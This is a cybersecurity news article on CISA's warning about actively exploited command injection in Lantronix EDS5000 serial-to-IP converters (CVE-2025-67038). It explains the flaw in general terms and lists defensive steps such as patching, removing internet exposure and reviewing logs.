threat-wire

CISA Warns of Active Attacks on Lantronix Industrial Devices

CISA has confirmed attackers are actively exploiting CVE-2025-67038, a critical flaw in Lantronix EDS5000 serial-to-IP converters that hands over root access. Federal agencies were ordered to patch by 26 June. The devices connect older industrial and building equipment to networks, so a compromise can open a path deeper inside.

By SecureBusinessHub Editorial, International cybersecurity desk — 2026-06-25 · 5 min read

CISA has put a hard deadline on a flaw it says is already being exploited. CVE-2025-67038 carries a CVSS score of 9.8 and affects Lantronix EDS5000 devices, the small boxes that connect serial equipment to an IP network. Federal civilian agencies were told to patch by 26 June 2026.

The flaw

The bug sits in the device's HTTP RPC module. When a login fails, the device writes a log entry by running a shell command, and it drops the username straight into that command without cleaning it first. An attacker can put operating system commands inside the username field, and the device runs them as root. No valid password is needed, because the flaw fires on the failed login itself.

Forescout's Vedere Labs reported it in April 2026 as one of a set of vulnerabilities it called BRIDGE:BREAK, affecting serial-to-IP converters from Lantronix and Silex. The same research found similar weaknesses in Silex hardware, so a site that standardised on one brand of adapter could have dozens of identical units exposed at once. CISA has not said who is exploiting the flaw or how the attacks are being carried out.

Why these boxes matter

Serial-to-IP converters are easy to forget. They sit in plant rooms, on factory floors, and in building management closets, quietly bridging a decades-old serial device to the network so it can be monitored remotely. Because they are infrastructure rather than computers people log into, they often run old firmware and rarely get checked. That is exactly the kind of device an attacker wants: trusted, networked, and ignored.

What to check now

• Identify any Lantronix EDS5000 units on your network, including the EDS5008, EDS5016, and EDS5032 models.
• Confirm the firmware version. Release 2.1.0.0R3 is affected; update to the fixed build named in Lantronix's advisory.
• Take the web management interface of these devices off the public internet. They should never be reachable from outside your own network.
• Review device logs for failed-login entries with odd characters or shell syntax in the username, a sign of attempted command injection.
• If you cannot patch at once, restrict network access to the device to a short list of known management hosts.

Plenty of small firms own one of these without realising it, bundled into a CCTV setup, an access-control system, or a piece of leased machinery. If a contractor installed any building automation or industrial kit for you, ask whether a Lantronix device is part of it and whether it has been patched. CISA only adds a flaw to its Known Exploited Vulnerabilities catalog once real attacks are confirmed, so this is not a theoretical risk.

There is no public detail yet on who the attackers are or what they are after. What is clear is the prize: a root shell on a converter that bridges operational equipment is a strong place to stand, because from there an attacker can pivot off the quiet device and into the machines it was wired to control.

• The Hacker News: CISA warns on Lantronix EDS5000
• NVD: CVE-2025-67038 detail
• CISA Known Exploited Vulnerabilities Catalog